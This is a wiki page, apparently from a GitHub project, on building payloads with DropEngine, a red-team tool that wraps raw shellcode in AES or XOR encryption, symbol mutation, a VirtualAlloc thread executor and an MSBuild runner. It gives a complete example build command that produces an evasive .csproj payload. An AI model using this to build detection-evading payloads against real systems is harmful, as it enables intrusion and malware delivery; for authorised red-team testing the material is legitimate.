II. Building Payloads

This section describes how to build payloads using DropEngine.

At minimum, we need to run DropEngine with the following flags to generate a payload:

Build (--build) - This flag tells DropEngine that we are building a payload
Shellcode (--shellcode <path/to/shellcode>) - This flag is pass our raw shellcode to DropEngine via its file path.
Interface (--interface <interface module name>) - Used to select which Interface module to use. Interface modules are used to coordinate the payload's build process, and are usually specific to the payload's technology stack (e.g. .NET C#, Python, etc).
EKeys (--ekeys <list of ekeys here>) - Used to select the ekey module used to generated the payloads encryption key (you can specify more than one if you'd like to use compound keying).
Crypter (--crypter <name of crypter module>) - Used to select a payload encryption method (i.e. AES or XOR)
DKeys (--dkeys <list of dkeys here>) - This flags is used to select one or more dkey modules, which add decryption key derivation functions to your payload. For each ekey you select, you must select a corresponding dkey.
Decrypter (--decrypter <name of decrypter module>) - Used to select a decrypter module, which adds a decryption subroutine to your payload. You must use a decrypter module that corresponds to the crypter module you selected using the --crypter flag.
Executor (--executor <name of executor module>) - Used to select an Executor module, which adds an executor subroutine to your payload.
Runner (--runner <name of runner module>) - Used to select an outer shell for your payload (e.g. MSBuild)
Mutator (--mutator <name of mutator module>) - Used to select a symbol mutation module for your payload (if you don't want to mutate symbols, select mutator_null).

Notice that the Payload Main component is missing from the list of flags above. There's a reason for this -- it's bundled with the Interface so that you don't have to worry about it.

Additionally, you can use the -o flag to write your payload to a file, and the --premodule and --postmodule flags to add subroutines to your payload that execute before or after your shellcode (although we won't cover them in detail here). These flags are all optional.

The following example command shows the actual syntax for generating a payload:

Command:

python dropengine.py --shellcode shell.bin \
--interface csharp_runner_interface \
--ekeys ekey_static \
--dkeys dkey_csharp_static \
--crypter crypter_aes  \
--decrypter decrypter_csharp_rijndael_aes \
--executor executor_csharp_virtual_alloc_thread \
--runner msbuild_csharp_runner \
-o example.csproj

Of course, you'll need to select payload components that are compatible with one another, which is covered in the next section II.-Listing-Modules.

Detailed descriptions of all module types are provided in Module-Types.

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

II. Building Payloads

DropeEngine Wiki

Home

Setup

Quick Start Guide

I. Module Selection

II. Creating the Payload

Operational Guidance

I. Conceptual Overview

II. Building Payloads

III. Listing Modules

Module Types

I. Interfaces

II. Runners

III. Executors

IV. Payload Encryption Modules

V. PreModules and PostModules

VI. Mutator Modules

Developer Guide

I. Creating Output Modules

II. Creating Crypter Modules

III. Creating EKey Modules

IV. Creating Mutator Modules

Acknowledgements

Clone this wiki locally